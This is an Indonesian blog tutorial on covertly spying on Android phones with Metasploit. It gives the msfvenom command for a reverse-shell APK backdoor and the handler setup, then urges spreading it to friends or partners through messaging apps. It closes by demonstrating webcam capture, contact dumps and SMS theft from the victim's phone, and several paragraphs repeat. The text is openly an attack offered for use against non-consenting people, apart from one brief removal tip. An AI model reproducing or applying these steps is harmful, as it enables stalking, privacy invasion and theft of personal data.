Tutorial Cara Menyadap Hp Android Menggunakan Metasploit Dengan Mudah
Putra Putri Solusion - Selamat datang di zona underground resmi indonesia yang dimana koenten kontenya membahas seputar hacking, exploit, deface, dan hal hal bersifat ilegal lainnya, jadi buat kalian yang belum berumur 18+ mohon untuk segeran menutup halaman ini demi kebaikan bersama terimakasih.
Selamat datang kembali dan kali ini admin akan memberikan trik yang cukup mengerikan yaitu cara menyadap android menggunkan metasploit, dimana kalian dapat mengontrol android teman, sahabta hingga pacar kalian dengan metode ini.
Selamat datang kembali dan kali ini admin akan memberikan trik yang cukup mengerikan yaitu cara menyadap android menggunkan metasploit, dimana kalian dapat mengontrol android teman, sahabta hingga pacar kalian dengan metode ini.
Namun perlu di perhatikan admin tidak bertanggung jawab atas apa yang terjadi pada kalian karena admin telah memberi tahukan di atas bahwasanya kalian haru berumur 18+ untuk melihat dan mempelajari tutorial dan tips trik dari Putra Putri Solusion
Oke Pertama cek IP
root@yukinoshita47:~# ifconfig
Kemudian tekan enter maka akan muncul ip nya seperti gambar dibawah ini ip gw 192.168.43.28
Lanjut kita buat dulu backdoor nya dengan perintah
msfvenom -p android/meterpreter/reverse_tcp LHOST=(ip) LPORT=(port) R > namafile.apk
contoh :
root@yukinoshita47:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.28 LPORT=4444 R > andro.apk
Kemudian tekan enter jika muncul seperti gambar dibawah ini berarti berhasil
Selanjut nya beri hak akses backdoor nya tadi disini nama backdoor nya andro.apk
root@yukinoshita47:~# chmod 777 andro.apk
kemudian tekan enter
Kemudian buka metasploit console dengan menggunakan perintah
root@yukinoshita47:~# msfconsole
Kemudian tekan enter akan muncul seperti gambar dibawah ini
Selanjut nya aktifkan exploit multi handler dengan masukkan perintah
msf > use multi/handler
kemudian tekan enter
Kemudian aktifkan payload nya dengan memasukkan perintah
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
kemudian tekan enter
Selanjut nya set IP dengan menggunakan perintah
msf exploit(handler) > set LHOST 192.168.43.28kemudian tekan enter
Lalu set port nya dengan memasukkan perintah
msf exploit(handler) > set LPORT 4444
Kemudian tekan enter
Selanjut nya jalan kan exploit nya dengan memasukkan perintah
msf exploit(handler) > exploit
kemudian tekan enter
Selanjut nya adalah penebaran backdoor nya bagaimana cara nya
Ya cara nya adalah :
- Sebar via internet
- Kirim ke Target yang dituju via Facebook, WA, BBM, LINE, dan lainnya dan pastikan Target Menginstall nya
- Langsung install ke smartphone target (you are the real social engineer bro :*)
kemudian buka backdoor apk nya tadi maka meterpreter session pun aktif disini kita udah dapat akses ke smartphone target langsung
jika butuh bantuan opsi::
ini daftar perintah nya masukkan perintah
meterpreter > help
kemudian tekan enter akan muncul seperti ini
(jika tidak butuh opsi ini , lewati saja langkah ini)
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
getuid Get the user that the server is running as
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OS
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Android Commands
================
Command Description
------- -----------
check_root Check if device is rooted
dump_calllog Get call log
dump_contacts Get contacts list
dump_sms Get sms messages
geolocate Get current lat-long using geolocation
Selanjut nya kita coba ambil foto dari kamera smartphone nya dengan memasukkan perintah
meterpreter > webcam_snap
Kemudian tekan enter maka akan muncul seperti gambar dibawah ini
Walah kok gelap -_- ulangi aja ya ..
(bug Version)
Oke berhasil foto nya buram -_- ngapain ya
Kita coba dump kontak smartphone nya dengan memasukkan perintah
meterpreter > dump_contacts
kemudian tekan enter
aduh error -_- gak ada kontak nya kali ya oke kita coba dump sms aja dengan memasukkan perintah
meterpreter > dump_sms
kemudian tekan enter
yeey berhasil :D
kita coba buka ternyata isinya SMS Operator semua :v wkwkwkwkwkwkk
Tanya : Saya kena backdoor metasploit ini min gimana solusi nya T_T
Jawab : ini jawaban nya
buka Settings > Aplikasi > Cari Apk Metasploit disini namanya MainActivity kemudian buka Apl nya terus pilih paksa berhenti
maka akses nya terputus seperti gambar dibawah ini :
baiklah cukup sampai disini tutorial nya lebih dan kurang mohon maaf silahkan explorasi sendiri jika tutorial ini dirasa masih kurang,
Ulangi lagi meterpreter > webcam_snap kemudian tekan enter
Oke berhasil foto nya buram -_- ngapain ya
Kita coba dump kontak smartphone nya dengan memasukkan perintah
meterpreter > dump_contacts
kemudian tekan enter
aduh error -_- gak ada kontak nya kali ya oke kita coba dump sms aja dengan memasukkan perintah
meterpreter > dump_sms
kemudian tekan enter
yeey berhasil :D
kita coba buka ternyata isinya SMS Operator semua :v wkwkwkwkwkwkk
Tanya : Saya kena backdoor metasploit ini min gimana solusi nya T_T
Jawab : ini jawaban nya
buka Settings > Aplikasi > Cari Apk Metasploit disini namanya MainActivity kemudian buka Apl nya terus pilih paksa berhenti
maka akses nya terputus seperti gambar dibawah ini :
baiklah cukup sampai disini tutorial nya lebih dan kurang mohon maaf silahkan explorasi sendiri jika tutorial ini dirasa masih kurang,
*jika masukan perintah lalu error, berarti aplikasi kita belum mendapatkan izin dari target tsb.


















Komentar
Posting Komentar